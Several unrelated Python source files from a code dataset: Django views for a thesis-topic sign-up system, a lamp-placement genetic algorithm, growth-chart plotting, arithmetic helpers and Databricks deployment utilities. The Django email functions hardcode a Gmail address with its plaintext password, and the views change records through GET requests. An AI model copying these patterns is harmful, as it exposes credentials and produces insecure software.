Teacher.objects.get(pk=self.request.session['user_id']).department\n faculty = user_department.faculty\n context['departments'] = Department.objects.filter(faculty=faculty)\n context['object_list'] = context['object_list'].filter(year_of_work=datetime.datetime.now().year,\n teacher_offer__year_of_work=year_of_work,\n teacher_offer__teacher__department=user_department) \\\n if type(context['object_list']) != list else context['object_list']\n elif self.request.session['role'] == 'methodist':\n user_department = Methodist.objects.get(pk=self.request.session['user_id']).department\n context['object_list'] = context['object_list'].filter(year_of_work=datetime.datetime.now().year,\n teacher_offer__year_of_work=year_of_work,\n teacher_offer__teacher__department=user_department) \\\n if type(context['object_list']) != list else context['object_list']\n else:\n context['departments'] = Department.objects.all()\n return context\n\n def get_queryset(self, **kwargs):\n if self.request.GET.get('department') is not None or self.request.GET.get(\n 'branch') is not None or self.request.GET.get('status') is not None or \\\n self.request.GET.get('interests') is not None:\n department = self.request.GET.get('department')\n branches = self.request.GET.getlist('branch')\n interests = self.request.GET.getlist('interests')\n status = self.request.GET.get('status')\n queryset = []\n empty = True\n if department != 'anything' and department is not None:\n dep = Department.objects.get(department_name=department)\n queryset = WriteWork.objects.filter(teacher_offer__teacher__department=dep,\n year_of_work=datetime.datetime.now().year)\n empty = False\n if branches:\n query = WriteWork.objects.filter(branch__branch_name__in=branches,\n year_of_work=datetime.datetime.now().year)\n queryset = list(set(query) & set(queryset)) if queryset else query\n empty = False\n if interests:\n query = WriteWork.objects.filter(\n teacher_offer__teacher__in=Teacher.objects.filter(branch__branch_name__in=interests),\n year_of_work=datetime.datetime.now().year)\n queryset = list(set(query) & set(queryset)) if queryset else query\n empty = False\n if status != 'anything':\n query = None\n if status == 'blocked':\n query = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n pk__in=Record.objects.filter(status='CONFIRMED').values_list(\n 'work', flat=True))\n elif status == 'available':\n query = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n pk__in=Record.objects.filter().exclude(\n status='CONFIRMED').values_list('work', flat=True))\n else:\n all = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year)\n zap = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n pk__in=Record.objects.all().values_list('work', flat=True))\n query = list(set(all) - set(zap))\n queryset = list(set(query) & set(queryset)) if queryset else query\n empty = False\n if not empty:\n return queryset\n\n if self.request.GET.get('theme') is not None:\n student = Student.objects.get(pk=self.request.session['user_id'])\n theme_id = self.request.GET.get('theme')\n theme = WriteWork.objects.get(pk=theme_id)\n Record.objects.filter(student=student, work=theme).delete()\n # send_email_cancel(student, theme)\n\n if self.request.GET.get('theme_id') is not None:\n student = Student.objects.get(pk=self.request.session['user_id'])\n theme_id = self.request.GET.get('theme_id')\n theme = WriteWork.objects.get(pk=theme_id)\n Record.objects.get_or_create(student=student, work=theme)\n # send_email_record(student, theme)\n\n if self.request.GET.get('teacher_name') is not None:\n users = User.objects.filter(first_name__icontains=self.request.GET.get('teacher_name')) \\\n .values_list('id', flat=True)\n teachers = Teacher.objects.filter(teacher_id__in=users).values_list('teacher_id', flat=True)\n places = TopicOffer.objects.filter(teacher__in=teachers).values_list('id', flat=True)\n queryset = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year, teacher_offer__in=places)\n return queryset\n if self.request.GET.get('work_name') is not None:\n queryset = WriteWork.objects.filter(year_of_work=datetime.datetime.now().year,\n work_name__icontains=self.request.GET.get('work_name'))\n return queryset\n return WriteWork.objects.all()\n\n\ndef send_email_record(student, theme):\n port = 465\n smtp_server = \"smtp.gmail.com\"\n sender_email = \"naukma.recording@gmail.com\"\n receiver_email = User.objects.get(pk=theme.teacher_offer.teacher_id).email\n password = 'naukma912'\n message = 'На Вашу тему \"' + theme.work_name + '\" записався студент ' + User.objects.get(pk=student.pk).first_name\n context = ssl.create_default_context()\n try:\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(sender_email, receiver_email, message.encode('utf-8', 'ignore'))\n server.quit()\n except smtplib.SMTPRecipientsRefused as e:\n print(e)\n\n\ndef send_email_cancel(student, theme):\n port = 465\n smtp_server = \"smtp.gmail.com\"\n sender_email = \"naukma.recording@gmail.com\"\n receiver_email = User.objects.get(pk=theme.teacher_offer.teacher_id).email\n password = 'naukma912'\n message = 'З Вашої теми \"' + theme.work_name + '\" виписався студент ' + User.objects.get(\n pk=student.pk).first_name\n context = ssl.create_default_context()\n try:\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(sender_email, receiver_email, message.encode('utf-8', 'ignore'))\n server.quit()\n except smtplib.SMTPRecipientsRefused as e:\n print(e)\n","sub_path":"AutomaticRecordingSystem/theme/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"640593824","text":"# Updated Animation Starter Code\nimport random\nimport math\nimport numpy \nimport copy\n\n\ndef runGeneration(lampsDict, numPeople, generations, data, mutationRate):\n newGen = []\n maxfit = None\n maxroom = None\n for i in range(generations):\n maxfit = None\n maxroom = None\n newGen = []\n print(\"generation %d out of %d\" % (i, generations))\n totalFitness = 0\n minFit = None\n for fitness in lampsDict:\n if minFit == None or fitness < minFit:\n minFit = fitness\n for fitness in lampsDict:\n totalFitness += fitness - minFit\n\n cumuProb = []\n rooms = []\n cumulativeProb = 0\n \n for fitness in lampsDict:\n newFit = fitness - minFit\n probability = (newFit/totalFitness)*100 + cumulativeProb\n cumulativeProb = probability\n cumuProb.append(probability)\n rooms.append(lampsDict[fitness])\n fitnesses = []\n trial = 1\n tempRooms = copy.deepcopy(rooms)\n while len(fitnesses) < numPeople:\n rooms = copy.deepcopy(tempRooms)\n print(\"Making baby %d out of %d\" % (len(fitnesses), numPeople))\n lampAndFitness = makeBaby(cumuProb, rooms, data, mutationRate)\n if lampAndFitness == None:\n print(\"Room did not survive, trial: %d\" % trial)\n trial += 1\n else:\n trial = 1\n newGen.append(lampAndFitness[0])\n fitnesses.append(lampAndFitness[1])\n lampsDict.clear()\n for i in range(len(newGen)):\n lampsDict[fitnesses[i]] = newGen[i]\n for fitIndex in lampsDict:\n if maxfit == None or fitIndex > maxfit:\n maxfit = fitIndex\n maxroom = lampsDict[fitIndex]\n\n print(\"MaxFit = %0.2f\" % maxfit)\n return maxroom\n\ndef checkBrightness500(lamps, data):\n BI = []\n for i in range(len(data.dots)):\n if dotInsideBox(data,data.dots[i]):\n continue\n index = brightNessIndex(data.dots[i], lamps, data) \n BI.append(index) \n if brightNessIndex(data.dots[i], lamps, data) == None:\n return [False]\n else:\n data.dots[i][2] = index\n return [True, BI]\n\ndef makeBaby(cumuProb, rooms, data, mutationRate):\n\n dad = random.random()*100\n #don't want them to be equal \n for i in range(len(cumuProb)):\n if cumuProb[i] > dad:\n dad = rooms[i]\n break\n mom = dad \n trialCount = 0\n while mom == dad:\n trialCount += 1\n #print(cumuProb)\n momIndex = random.random()*100\n for j in range(len(cumuProb)):\n if cumuProb[j] > momIndex:\n #print(cumuProb[j])\n mom = rooms[j]\n break\n if trialCount > 100:\n return None\n newLamps = set()\n brightnessForAllG500 = [False]\n while brightnessForAllG500[0] == False:\n randNum = random.randint(0,1)\n if len(dad) == 0:\n randNum = 1\n if len(mom) == 0:\n print(\"oops\")\n if len(mom) == 0:\n randNum = 0\n if randNum == 0:\n #select a lamp from dad\n randNum = random.randint(0,len(dad)-1)\n newLamps.add(dad[randNum])\n dad.pop(randNum)\n else:\n #select a lamp from mom\n randNum = random.randint(0,len(mom)-1)\n newLamps.add(mom[randNum])\n mom.pop(randNum)\n #check if all 500\n brightnessForAllG500 = checkBrightness500(list(newLamps), data)\n BI = brightnessForAllG500[1]\n\n newLamps = list(newLamps)\n #mutate lamps\n mutation = False\n for lamp in newLamps:\n #location \n randNum = random.randint(0,99)\n if randNum < mutationRate:\n mutation = True\n print(\"Mutation of location!\")\n x = lamp.x\n y = lamp.y\n inrange = False\n trialCounter = 0\n while inrange == False:\n trialCounter += 1\n newx = x + numpy.random.normal(scale = 10)\n newy = y + numpy.random.normal(scale = 10)\n if (newx > 5 and newx < 450) and (newy > 5 and newy < 450):\n inrange = True\n lamp.x = newx\n lamp.y = newy\n if trialCounter > 70:\n return None\n #brightness\n randNum = random.randint(0,99)\n if randNum < mutationRate:\n mutation = True\n print(\"Mutation of brightness!\")\n bright = lamp.lumens\n inrange = False\n trialCounter2 = 0\n while inrange == False:\n trialCounter2 += 1\n newbright = bright + numpy.random.normal(scale = 20)\n if (lamp.lumens > 1500 and lamp.lumens < 4000):\n inrange = True\n lamp.lumens = newbright\n if trialCounter2 > 70:\n return None\n if mutation:\n brightnessForAllG500 = checkBrightness500(newLamps, data)\n\n if brightnessForAllG500[0] == False:\n print(\"Mutation hurt offspring\")\n return None\n totalCost = []\n for lamp in data.lamps:\n totalCost.append(lamp.cost)\n standardDeviation = (numpy.std(BI))/22\n BIaverage = (sum(BI)/len(BI))/4\n cost = (sum(totalCost))/20016\n\n result = [BIaverage, standardDeviation, cost]\n BI = result[0]*1000\n SD = result[1]*1000\n C = result[2]*1000\n fit = BI - SD - C\n # [lamps, fitness]\n return [newLamps, fit]\n \n \n \n\n\nclass Lamp(object):\n def __init__(self, data):\n self.x = random.randint(5,450)\n self.y = random.randint(5,450)\n self.lumens = random.randint(1500, 4000)\n self.cost = (self.lumens-1500)/2500\n while dotInsideBox(data, [self.x,self.y]):\n self.x = random.randint(5,450)\n self.y = random.randint(5,450)\n def drawLamp(self,canvas):\n canvas.create_oval(self.x-4,self.y-4, self.x+4, self.y+4, width = self.lumens/2000, outline = \"red\", fill = \"yellow\")\n\n def __repr__(self):\n return \"Lamp at (%0.02f, %0.02f) with %d brightness and %0.1f cost\" % (self.x, self.y, self.lumens, self.cost)\n####################################\n# customize these functions\n####################################\n\n#check this again\ndef rectIntersect(tlx, tly, brx, bry, x1, y1, x2, y2):\n if x1 == x2:\n if x1 >= tlx and x1<= brx:\n return True\n if y1 == y2:\n if y1 >= tly and y1 <= bry:\n return True \n tlx, tly = tly, tlx\n brx, bry = bry, brx\n x1, y1 = y1, x1\n x2, y2 = y2, x2\n\n m = (y2-y1)/(x2-x1)\n b = y2-m*x2\n\n lefty = m*(tlx)+b\n righty = m*(brx)+b\n topx = (tly-b)/m\n botx = (bry-b)/m\n if (lefty <= tly and lefty >= bry) or (righty <= tly and righty >= bry):\n return True\n if (topx >= tlx and topx <= brx) or (botx >= tlx and botx <= brx):\n return True\n return False\n\ndef distFor(x1,y1,x2,y2):\n return math.sqrt((x1-x2)**2 + (y1-y2)**2)\n\n#dot = [x,y] \n#lamps = [lamp1, lamp2...]\ndef brightNessIndex(dot, lamps, data):\n totalBright = 0 \n for lamp in lamps:\n if not (rectIntersect(data.r1[0], data.r1[1], data.r1[2],data.r1[3],dot[0],dot[1],lamp.x,lamp.y) or rectIntersect(data.r2[0], data.r2[1], data.r2[2],data.r2[3],dot[0],dot[1],lamp.x,lamp.y) or rectIntersect(data.r3[0], data.r3[1], data.r3[2],data.r3[3],dot[0],dot[1],lamp.x,lamp.y)):\n distance = distFor(dot[0],dot[1], lamp.x, lamp.y)/500\n brightness = lamp.lumens/(4*math.pi*(distance**2))\n totalBright += brightness\n if totalBright < 500:\n return None\n return (-math.atan(.02*(totalBright-500)) + math.pi/2)/1.5\n\ndef dotInsideBox(data, dot):\n return ((data.r1[0] <= dot[0] <= data.r1[2]) and (data.r1[1] <= dot[1] <= data.r1[3])) or ((data.r2[0] <= dot[0] <= data.r2[2]) and (data.r2[1] <= dot[1] <= data.r2[3])) or ((data.r3[0] <= dot[0] <= data.r3[2]) and (data.r3[1] <= dot[1] <= data.r3[3]))\n\nclass Struct(object): pass\ndata = Struct()\ndata.r1 = [300,300,350, 350]\ndata.r2 = [100,100,150, 150]\ndata.r3 = [350,150,400, 190]\n\n\n####################################\n# use the run function as-is\n####################################\n","sub_path":"generations.py","file_name":"generations.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"125140068","text":"import os\nfrom unittest import TestCase, main\nfrom gruffy import AccumulatorBar\n\nTARGET_FILE = 'test.png'\n\n\nclass TestAccumulatorBar(TestCase):\n\n def tearDown(self):\n os.remove(TARGET_FILE)\n\n def test_writable(self):\n g = AccumulatorBar()\n g.theme_pastel()\n g.theme_greyscale()\n\n g.data(\"test1\", [1, 2, 3])\n g.write(TARGET_FILE)\n\nif __name__ == '__main__':\n main()\n","sub_path":"test/test_accumulator_bar.py","file_name":"test_accumulator_bar.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"121106469","text":"# On importe les modules qui vont nous permettre de traiter les données\n\n# matplotlib pour réaliser les graphiques\n# import matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\n# csv pour lire les fichiers de données\nimport csv\n\n####Poids###\nxpoids5 = []\nypoids5 = []\nxpoids25 = []\nypoids25 = []\nxpoids50 = []\nypoids50 = []\nxpoids75 = []\nypoids75 = []\nxpoids95 = []\nypoids95 = []\nxmois_mesures = []\nymois_mesures = []\n\n### Récupération des mesures dans les fichiers à faire\n#Ouverture du fichier des normes de poids et stockage dans une liste absisses et une liste ordonnées\nwith open('./Docs-Projet/python-project-trackbaby/constantes-nourrissons-light/poids-age-garcon-0-60-light.csv', newline='') as csvfile:\n fichierlu = csv.reader(csvfile, delimiter=';')\n for row in fichierlu : \n if row[0] != 'Month' :\n xpoids5.append(int(row[0]))\n ypoids5.append(float(row[1]))\n\n xpoids25.append(int(row[0]))\n ypoids25.append(float(row[2]))\n\n xpoids50.append(int(row[0]))\n ypoids50.append(float(row[3]))\n\n xpoids75.append(int(row[0]))\n ypoids75.append(float(row[4]))\n\n xpoids95.append(int(row[0]))\n ypoids95.append(float(row[5]))\n\n#ouverture du fichier des mesures et stockage en 2 listes absisse et ordonnées des mesures de poids\nwith open('./Docs-Projet/python-project-trackbaby/mesures.csv', newline='') as csvfile:\n ficmesures = csv.reader(csvfile, delimiter=';')\n for row in ficmesures : \n if row[0] != 'Mois' :\n xmois_mesures.append(int(row[0]))\n ymois_mesures.append(float(row[1]))\n\n\n\n### Affichage du graphique du poids\nplt.subplot(1, 3, 1)\nplt.xlabel('Age en mois')\nplt.ylabel('Poids en kg')\nplt.plot(xpoids5,ypoids5, color='blue', label = '5% poids')\nplt.plot(xpoids25,ypoids25, color='orange', label = '25% poids')\nplt.plot(xpoids50,ypoids50, color='green', label = '50% poids')\nplt.plot(xpoids75,ypoids75, color='red', label = '75% poids')\nplt.plot(xpoids95,ypoids95, color='purple', label = '95% poids')\nplt.plot(xmois_mesures,ymois_mesures, marker='o', color='black')\nplt.legend()\n\nplt.grid()\n\n####Taille###\n\nxtaille5 = []\nytaille5 = []\nxtaille25 = []\nytaille25 = []\nxtaille50 = []\nytaille50 = []\nxtaille75 = []\nytaille75 = []\nxtaille95 = []\nytaille95 = []\nxmois_mesuresT = []\nymois_mesuresT = []\n\n### Récupération des mesures dans les fichiers à faire\n#Ouverture du fichier des normes de taille et stockage dans une liste absisses et une liste ordonnées\nwith open('./Docs-Projet/python-project-trackbaby/constantes-nourrissons-light/taille-age-garcon-0-60-light.csv', newline='') as csvfile:\n fichierTlu = csv.reader(csvfile, delimiter=';')\n for row in fichierTlu : \n if row[0] != 'Month' :\n xtaille5.append(int(row[0]))\n ytaille5.append(float(row[1]))\n\n xtaille25.append(int(row[0]))\n ytaille25.append(float(row[2]))\n\n xtaille50.append(int(row[0]))\n ytaille50.append(float(row[3]))\n\n xtaille75.append(int(row[0]))\n ytaille75.append(float(row[4]))\n\n xtaille95.append(int(row[0]))\n ytaille95.append(float(row[5]))\n\n#ouverture du fichier des mesures et stockage en 2 listes absisse et ordonnées des mesures de taille\nwith open('./Docs-Projet/python-project-trackbaby/mesures.csv', newline='') as csvfile:\n ficmesuresT = csv.reader(csvfile, delimiter=';')\n for row in ficmesuresT : \n if row[0] != 'Mois' :\n xmois_mesuresT.append(int(row[0]))\n ymois_mesuresT.append(float(row[2]))\n\n\n### Affichage du graphique de la taille\n\nplt.subplot(1, 3, 2)\nplt.xlabel('Age en mois')\nplt.ylabel('Taille en cm')\nplt.plot(xtaille5,ytaille5, color='blue', label = '5% taille')\nplt.plot(xtaille25,ytaille25, color='orange', label = '25% taille')\nplt.plot(xtaille50,ytaille50, color='green', label = '50% taille')\nplt.plot(xtaille75,ytaille75, color='red', label = '75% taille')\nplt.plot(xtaille95,ytaille95, color='purple', label = '95% taille')\nplt.plot(xmois_mesuresT,ymois_mesuresT, marker='o', color='black')\nplt.legend()\n\nplt.grid()\n\n####TaillePérimètre cranien###\n\nxpc5 = []\nypc5 = []\nxpc25 = []\nypc25 = []\nxpc50 = []\nypc50 = []\nxpc75 = []\nypc75 = []\nxpc95 = []\nypc95 = []\nxmois_mesuresPC = []\nymois_mesuresPC = []\n\n### Récupération des mesures dans les fichiers à faire\n#Ouverture du fichier des normes de périmètre cranien et stockage dans une liste absisses et une liste ordonnées\nwith open('./Docs-Projet/python-project-trackbaby/constantes-nourrissons-light/perim-cra-age-garcon-0-60-light.csv', newline='') as csvfile:\n fichierPClu = csv.reader(csvfile, delimiter=';')\n for row in fichierPClu : \n if row[0] != 'Month' :\n xpc5.append(int(row[0]))\n ypc5.append(float(row[1]))\n\n xpc25.append(int(row[0]))\n ypc25.append(float(row[2]))\n\n xpc50.append(int(row[0]))\n ypc50.append(float(row[3]))\n\n xpc75.append(int(row[0]))\n ypc75.append(float(row[4]))\n\n xpc95.append(int(row[0]))\n ypc95.append(float(row[5]))\n\n#ouverture du fichier des mesures et stockage en 2 listes absisse et ordonnées des mesures de périmètre cranien\nwith open('./Docs-Projet/python-project-trackbaby/mesures.csv', newline='') as csvfile:\n ficmesuresPC = csv.reader(csvfile, delimiter=';')\n for row in ficmesuresPC : \n if row[0] != 'Mois' :\n xmois_mesuresPC.append(int(row[0]))\n ymois_mesuresPC.append(float(row[3]))\n\n\n### Affichage du graphique du périmètre cranien\nplt.subplot(1, 3, 3)\nplt.xlabel('Age en mois')\nplt.ylabel('Périmètre cranien en cm')\nplt.plot(xpc5,ypc5, color='blue', label = '5% périmètre cranien')\nplt.plot(xpc25,ypc25, color='orange', label = '25% périmètre craniene')\nplt.plot(xpc50,ypc50, color='green', label = '50% périmètre cranien')\nplt.plot(xpc75,ypc75, color='red', label = '75% périmètre cranien')\nplt.plot(xpc95,ypc95, color='purple', label = '95% périmètre cranien')\nplt.plot(xmois_mesuresPC,ymois_mesuresPC, marker='o', color='black')\nplt.legend()\n\nplt.grid()\nplt.show()","sub_path":"projet-etape2.py","file_name":"projet-etape2.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"464602428","text":"\ndef suma(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\treturn var1+var2\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\ndef resta(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\treturn var1-var2\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\ndef producto(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\tif type(var1*var2) is int:\n\t\t\treturn var1*var2\n\t\telif type(var1*var2) is float:\n\t\t\treturn var1*var2\n\t\telse:\n\t\t\treturn \"Solo ingrese numeros\"\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\ndef division(a,b):\n\ttry:\n\t\tvar1 = a\n\t\tvar2 = b\n\t\treturn var1/var2\n\texcept TypeError:\n\t\treturn \"Error solo ingrese numeros\"\n\texcept ZeroDivisionError:\n\t\treturn \"No se puede dividir por 0\"\n\n","sub_path":"Curso de Python de Cero a Maestro/Ejercicios/operaciones.py","file_name":"operaciones.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"489585223","text":"from typing import Dict, List, Tuple, Any, Union\nfrom uuid import uuid1\nfrom time import sleep\nimport base64\nimport os\nimport shutil\nimport subprocess\nimport re\nimport requests\n\n\ndef call_get(url: str, headers: Dict[str, str], params: Dict[str, str] = None, error_message: str = None) \\\n -> requests.models.Response:\n r = requests.get(url, headers=headers, params=params)\n if r.status_code != 200:\n raise Exception(f'{error_message}, {r.status_code}, {r.reason}, {r.text}')\n return r\n\n\ndef call_post(url: str, headers: Dict[str, str] = None, json: Dict = None, data: Dict = None, files: Dict = None,\n error_message: str = None, exceptions_not_allowed: bool = True) -> requests.models.Response:\n r = requests.post(url, headers=headers, json=json, data=data, files=files)\n if r.status_code != 200 and exceptions_not_allowed:\n raise Exception(f'{error_message}, {r.status_code}, {r.reason}, {r.text}')\n return r\n\n\ndef run_scheduled_job(env: str, job_keyword: str, override_envs: Dict[str, Any], deploy_config: Dict[str, Any]) -> int:\n # Todo: inject env into job name to look only for given env jobs / select run cluster based on env\n print(env)\n existing_jobs = list_existing_jobs(deploy_config['deploy_url'])\n if not existing_jobs:\n raise Exception('No runnable jobs found')\n matching_jobs = [j for j in existing_jobs if job_keyword in j['settings']['name'] and\n env in j['settings']['name']]\n if not matching_jobs:\n raise Exception(f'No jobs found with keyword {job_keyword}')\n selected_job = 0\n if len(matching_jobs) > 1:\n selected_job = int(input(f'Enter the sequence of the job you want to run'\n f' (0-{len(matching_jobs) - 1}, default: 0): '))\n if not selected_job:\n selected_job = 0\n runnable_job = matching_jobs[selected_job]\n print(f'Selected job: {runnable_job}')\n\n data = {\"job_id\": runnable_job['job_id']}\n if override_envs:\n data['notebook_params'] = override_envs\n headers = {\"content-type\": \"application/json\"}\n\n url = f'{deploy_config[\"deploy_url\"]}/jobs/run-now'\n r = call_post(url, headers=headers, json=data, error_message='Error while attempting to run notebook')\n print('Job started successfully')\n return r.json()['run_id']\n\n\ndef list_existing_jobs(url_prefix: str) -> List[Dict[str, Any]]:\n url = f'{url_prefix}/jobs/list'\n headers = {\"content-type\": \"application/json\"}\n r = call_get(url, headers=headers, error_message='Error while fetching existing job definitions')\n return r.json()['jobs']\n\n\ndef parse_email_notifications(env: str, email_settings: Dict[str, Any]) -> Dict[str, Union[str, List[str]]]:\n try:\n env_mails = email_settings['ENV_TARGET_EMAILS'][env]\n except KeyError:\n raise Exception(f'No runtime env {env} defined in deployfile: {email_settings}')\n accepted_states = ['on_start', 'on_success', 'on_failure']\n if any(x.lower() not in accepted_states for x in email_settings['ALERT_ON_STATES']):\n raise Exception(f'Given state alerts {email_settings[\"ALERT_ON_STATES\"]} contains invalid states.'\n f'Accepted values: {accepted_states}')\n email_notifications = {state_change.lower(): env_mails for state_change in email_settings['ALERT_ON_STATES']}\n if 'ALERT_SKIPPED_RUNS' in email_settings:\n # Some ugly code here. Databricks asks funnily phrased bool \"no_alert_for_.....\"\n # more clear to ask bool for alert_for.. ‾\\_(ツ)_/‾\n given_bool = str(email_settings['ALERT_SKIPPED_RUNS']).lower()\n if given_bool not in ('true', 'false'):\n raise Exception(f'Invalid value given for ALERT_SKIPPED_RUNS: {given_bool}.'\n f'Accepted values: [\"true\", \"false\"], no case sensitivity')\n bool_converted = given_bool == 'true'\n email_notifications['no_alert_for_skipped_runs'] = str(not bool_converted).lower()\n return email_notifications\n\n\ndef delete_existing_job(url_prefix: str, job_name) -> None:\n existing_jobs = list_existing_jobs(url_prefix)\n if not existing_jobs:\n return\n matching_jobs = [j for j in existing_jobs if j['settings']['name'] == job_name]\n if not matching_jobs:\n return\n print(f'Found {len(matching_jobs)} matching job names, overwriting')\n job_ids = [job['job_id'] for job in matching_jobs]\n\n headers = {\"content-type\": \"application/json\"}\n url = f'{url_prefix}/jobs/delete'\n for job_id in job_ids:\n data = {'job_id': job_id}\n r = call_post(url, headers=headers, json=data, error_message='Error while deleting old job definition')\n\n\ndef apply_job_scheduling(env: str, url_prefix: str, job_config: Dict[str, Any]) -> None:\n job_name = f\"base_schedule_{job_config['parsed_job_name']}\"\n delete_existing_job(url_prefix, job_name)\n\n headers = {\"content-type\": \"application/json\"}\n url = f'{url_prefix}/jobs/create'\n\n data = {\"existing_cluster_id\": job_config['cluster_id'],\n \"notebook_task\": {\"notebook_path\": job_config['absolute_job_path'],\n \"base_parameters\": {\"ENVIRONMENT\": env}},\n \"name\": job_name,\n # max_retries, # NOT IN USE\n # min_retry_interval_millis, NOT IN USE\n # retry_on_timeout, NOT IN USE\n \"timeout_seconds\": f\"{60 * 60 * 12}\",\n \"schedule\":\n {\"quartz_cron_expression\": f\"{job_config['SCHEDULE_EXPRESSION']}\",\n \"timezone_id\": \"Europe/Helsinki\"},\n \"max_concurrent_runs\": 10}\n if 'EMAIL_NOTIFICATIONS' in job_config:\n data['email_notifications'] = parse_email_notifications(env, job_config['EMAIL_NOTIFICATIONS'])\n r = call_post(url, headers=headers, json=data, error_message='Job scheduling error')\n print('Scheduling applied successfully')\n\n\ndef inject_matching_cluster_id(cluster_location: str, env: str, cluster: str) -> str:\n cluster_with_env = f'{cluster}_{env}'\n headers = {\"content-type\": \"application/json\"}\n url = f'{cluster_location}/clusters/list'\n r = call_get(url, headers=headers, error_message='Error while fetching existing clusters')\n all_clusters = r.json().get('clusters', '')\n if not all_clusters:\n raise Exception(f'No existing clusters found')\n matching_clusters = [c for c in all_clusters if c['cluster_name'] == cluster_with_env]\n if not matching_clusters:\n raise Exception(f'No clusters found with given identifier {cluster_with_env}')\n selected_cluster = 0\n if len(matching_clusters) > 1:\n selected_cluster = int(input(f'Enter the sequence of the cluster you want to deploy the job in'\n f' (0-{len(matching_clusters) - 1}, default: 0): '))\n if not selected_cluster:\n selected_cluster = 0\n print(f'Selected cluster: {matching_clusters[selected_cluster]}')\n return matching_clusters[selected_cluster]['cluster_id']\n\n\ndef push_code_to_databricks(url_prefix: str, job_config: Dict[str, Any]) -> None:\n headers = {\"content-type\": \"application/json\"}\n data = {\"path\": f\"{job_config['absolute_job_path']}\",\n \"format\": f\"{job_config['FORMAT']}\",\n \"language\": f\"{job_config['LANGUAGE']}\",\n \"content\": f\"{job_config['encoded_code']}\",\n \"overwrite\": \"true\"}\n url = f'{url_prefix}/workspace/import'\n r = call_post(url, headers=headers, json=data, error_message='Error in notebook deployment')\n print('Notebook deployed successfully')\n\n\ndef convert_code_to_base64(file: str) -> str:\n with open(file, 'rb') as f:\n code = str(base64.b64encode(f.read()), 'utf-8')\n return code\n\n\ndef inject_job_path(env: str, job_config: Dict[str, Any]) -> Tuple[str, str]:\n job_service_name = job_config.get('JOB_NAME', '')\n target_job_name = job_service_name if job_service_name else job_config['JOB_TO_DEPLOY'].replace('.py', '')\n target_job_name = f'{target_job_name}-{env}'\n return f\"{job_config['TARGET_DIRECTORY']}/{target_job_name}\", target_job_name\n\n\ndef get_latest_maven_artifact(requirement_name: str) -> str:\n artifact_parts = requirement_name.split(':')\n if len(artifact_parts) != 3:\n raise ValueError(f'Given maven artifact {requirement_name} is invalid, '\n f'must be in format GROUP:ARTIFACT:VERSION')\n group_id = artifact_parts[0]\n artifact_id = artifact_parts[1]\n\n url = 'https://repository.sonatype.org/service/local/artifact/maven/redirect'\n headers = {\"content-type\": \"application/json\"}\n params = {\"r\": \"central-proxy\",\n \"g\": group_id,\n \"a\": artifact_id,\n \"v\": \"LATEST\"}\n r = call_get(url, headers=headers, params=params, error_message='Error in maven version check')\n url_parts = r.url.split('/')\n if not re.search(r'[^0-9.]', url_parts[-2]):\n return url_parts[-2]\n raise Exception(f'Unable to find latest version for artifact {requirement_name}: {r.url}')\n\n\ndef subproc_run(*args, **kwargs):\n return subprocess.run(*args, **kwargs, check=True).check_returncode()\n\n\ndef artifact_install_present(coordinate_to_install: List[str], existing_artifact_versions: List[List[str]]) -> bool:\n # If coordinate == existing, same version is on cluster\n # If coordinate version is less than existing coordinate in case that coordinate G:A == existing G:A, new version\n # is on the cluster\n return any(coordinate_to_install == existing or\n (coordinate_to_install[2] < existing[2] and coordinate_to_install[:2] == existing[:2])\n for existing in existing_artifact_versions)\n\n\ndef ensure_cluster_is_running(deploy_url: str, cluster_id: str) -> None:\n cluster_url_prefix = f'{deploy_url}/clusters'\n data = {\"cluster_id\": cluster_id}\n\n def _is_cluster_running(cluster_url_prefix: str, data: Dict[str, str]):\n headers = {\"content-type\": \"application/json\"}\n r = call_get(f'{cluster_url_prefix}/get', headers=headers, params=data,\n error_message='Error in cluster status update')\n if r.json()['state'] == 'RUNNING':\n return True\n return False\n\n if not _is_cluster_running(cluster_url_prefix, data):\n print('Cluster not running, starting')\n headers = {\"content-type\": \"application/json\"}\n r = call_post(url=f'{cluster_url_prefix}/start', headers=headers, json=data, error_message='Starting cluster')\n print('Start command successful')\n while not _is_cluster_running(cluster_url_prefix, data):\n print('Waiting for cluster to start')\n sleep(5)\n\n\ndef deploy_requirements_to_databricks(deploy_url: str, cluster_id: str, requirements: List[Dict[str, Any]]) -> None:\n print('Checking previous installs on cluster')\n cluster_status_url = f'{deploy_url}/libraries/cluster-status'\n headers = {\"content-type\": \"application/json\"}\n params = {\"cluster_id\": cluster_id}\n r = call_get(cluster_status_url, headers=headers, params=params, error_message='Error in checking cluster status')\n previously_installed = r.json()\n\n final_requirements: List[Dict[str, Any]] = []\n existing_artifact_versions = []\n if any('maven' in x['library'] for x in previously_installed.get('library_statuses', {})):\n existing_artifact_versions = [x['library']['maven']['coordinates'].split(':')\n for x in previously_installed['library_statuses']\n if 'maven' in x['library'] and x['status'] == 'INSTALLED']\n for requirement in requirements:\n # TODO: check local repos + pypi + jar versions somehow to 